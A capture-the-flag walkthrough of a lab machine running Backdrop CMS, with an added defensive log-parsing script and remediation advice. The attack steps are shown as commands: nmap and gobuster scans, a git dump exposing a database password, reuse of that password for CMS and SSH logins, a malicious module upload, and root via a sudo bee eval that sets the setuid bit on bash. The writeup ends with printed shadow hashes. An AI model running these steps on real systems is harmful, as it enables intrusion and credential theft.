Basic information

Port scan

22 and 80:

$ nmap -sC -sV -Pn 10.10.11.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-10 14:11 CST
Nmap scan report for 10.10.11.58
Host is up (0.066s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
| 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_ 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
| http-git:
| 10.10.11.58:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: todo: customize url aliases. reference:https://docs.backdro...
|_http-title: Home | Dog
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.81 seconds

80

A blog running Backdrop CMS:

Directory scan

The directory scan reveals an exposed .git repository:

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u http://10.10.11.58/

/.git/HEAD (Status: 200) [Size: 23]
/.git (Status: 301) [Size: 309] [--> http://10.10.11.58/.git/]
/.git/config (Status: 200) [Size: 92]
/.git/logs/ (Status: 200) [Size: 1130]
/.git/index (Status: 200) [Size: 344667]
/.htaccess (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/.hta (Status: 403) [Size: 276]
/core (Status: 301) [Size: 309] [--> http://10.10.11.58/core/]
/files (Status: 301) [Size: 310] [--> http://10.10.11.58/files/]
/index.php (Status: 200) [Size: 13332]
/layouts (Status: 301) [Size: 312] [--> http://10.10.11.58/layouts/]
/modules (Status: 301) [Size: 312] [--> http://10.10.11.58/modules/]
/robots.txt (Status: 200) [Size: 1198]
/server-status (Status: 403) [Size: 276]
/sites (Status: 301) [Size: 310] [--> http://10.10.11.58/sites/]
/themes (Status: 301) [Size: 311] [--> http://10.10.11.58/themes/]

dog git

Standard git dump:

git-dumper http://10.10.11.58/ dog_git
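From the defender's side, the same exposure is visible in the web server's access log: a git dump shows up as a burst of successful requests for files under /.git/ from one source. The following is an added example, not part of the original writeup; it parses Apache combined-format lines (the log lines are constructed samples) and reports sources that actually retrieved repository files, distinguishing them from a single probe that got a 404.

```python
import re
from collections import defaultdict

# Constructed sample of Apache combined-log lines (not taken from the original page).
SAMPLE_LOG = """\
10.10.14.5 - - [10/Mar/2025:14:20:01 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "git-dumper/1.0"
10.10.14.5 - - [10/Mar/2025:14:20:01 +0000] "GET /.git/config HTTP/1.1" 200 92 "-" "git-dumper/1.0"
10.10.14.5 - - [10/Mar/2025:14:20:02 +0000] "GET /.git/index HTTP/1.1" 200 344667 "-" "git-dumper/1.0"
10.10.14.5 - - [10/Mar/2025:14:20:02 +0000] "GET /.git/objects/ab/cdef HTTP/1.1" 200 512 "-" "git-dumper/1.0"
192.0.2.7 - - [10/Mar/2025:14:21:10 +0000] "GET /index.php HTTP/1.1" 200 13332 "-" "Mozilla/5.0"
192.0.2.7 - - [10/Mar/2025:14:21:11 +0000] "GET /.git/HEAD HTTP/1.1" 404 276 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [timestamp] "METHOD PATH PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Return the named fields of one combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_git_exposure(log_text, threshold=3):
    """Map each source IP to the /.git/ paths it fetched with HTTP 200.

    Only sources with at least `threshold` successful fetches are reported: a
    lone 200 on /.git/HEAD is already a finding, but a run of them is a dump in
    progress, while a 404 means the server did not hand anything out.
    """
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # ignore any query string
        if (path == "/.git" or path.startswith("/.git/")) and rec["status"] == "200":
            hits[rec["ip"]].append(path)
    return {ip: paths for ip, paths in hits.items() if len(paths) >= threshold}


if __name__ == "__main__":
    for ip, paths in find_git_exposure(SAMPLE_LOG).items():
        print(f"{ip}: {len(paths)} repository files served, e.g. {paths[0]}")
```

The fix on the server side is to keep .git out of the document root entirely, or to deny the directory in the Apache configuration, and to keep credentials such as the database URL in the settings file out of version control.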

The settings file then yields a password:

$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';

A grep also turns up a username:

$ grep -irn '@dog.htb' .
./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:12: "tiffany@dog.htb"

Backdrop CMS

Logging in with the recovered username and password shows Backdrop CMS version 1.27.1:

tiffany@dog.htb
BackDropJ2024DS2024

A search turns up a relevant vulnerability:

rce

The exploit produces a zip file, but this environment needs a tar archive, so just repackage it by hand:

tar -zcvf shell.tar.gz shell

Upload the module, enable it, and browse to it to execute commands as www-data:

Listing the home directories shows two users:

jobert
johncusack

user flag

johncusack reuses the known password, so log in over SSH:

Privilege escalation information

johncusack can run bee via sudo; checking its supported options shows that it can execute arbitrary PHP code:

Privilege escalation & root flag

So run bee with sudo to execute PHP code:

sudo /usr/local/bin/bee --root=/var/www/html eval 'exec("chmod +s /bin/bash")'

shadow

root:$6$buHS/pADc6PYMPvf$XTArYbNF62hfC04MHiAhaXHeWdUblAeXNLc/SbN7baQRUfHgIhmklPJfj2u7HZp9qb6gpFyXVnicT4FvRJ4Nm/:20117:0:99999:7:::
jobert:$6$9NZzmqUK4cJcMtd/$.CO/yezHu0S6cUZdPcd2QHfg3YVM7VUCMlHUvTCF.J7dMFB8sdNerBjIwe.l5YHZcXn2c0lkux5jI8eaC0B/x/:19950:0:99999:7:::
johncusack:$6$70rLgjVTNIxmr6zb$N2vsXuYZ7rug6ksshK5Jdwp0mUrQ.KvH3t73ycJe87QxNFw96GV.V/GEYWtzM/Cc..ISjhaleee5/uP29XZzM.:19950:0:99999:7:::

References